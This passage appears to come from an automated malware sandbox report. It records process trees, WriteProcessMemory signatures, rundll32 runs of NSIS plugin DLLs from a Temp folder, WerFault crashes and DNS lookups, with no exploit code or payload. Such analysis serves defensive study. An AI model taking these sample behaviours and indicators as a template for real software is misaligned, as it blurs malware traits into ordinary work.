PID 3036 wrote to memory of 3044 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3036 wrote to memory of 3044 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3036 wrote to memory of 3044 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3036 wrote to memory of 3044 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3036 wrote to memory of 3044 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3036 wrote to memory of 3044 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3044 wrote to memory of 2872 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\WerFault.exe
PID 3044 wrote to memory of 2872 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\WerFault.exe
PID 3044 wrote to memory of 2872 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\WerFault.exe
PID 3044 wrote to memory of 2872 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\blowfish.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\blowfish.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 224

Network

N/A

Files

memory/3044-0-0x00000000001C0000-0x00000000001CC000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-04-10 10:03

Reported

2024-04-10 10:05

Platform

win10v2004-20231215-en

Max time kernel

93s

Max time network

122s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsUnzip.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2732 wrote to memory of 4944 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2732 wrote to memory of 4944 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2732 wrote to memory of 4944 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsUnzip.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsUnzip.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4944 -ip 4944

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4944 -s 612

Network

Country Destination Domain Proto
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 17.143.109.104.in-addr.arpa udp

Files

N/A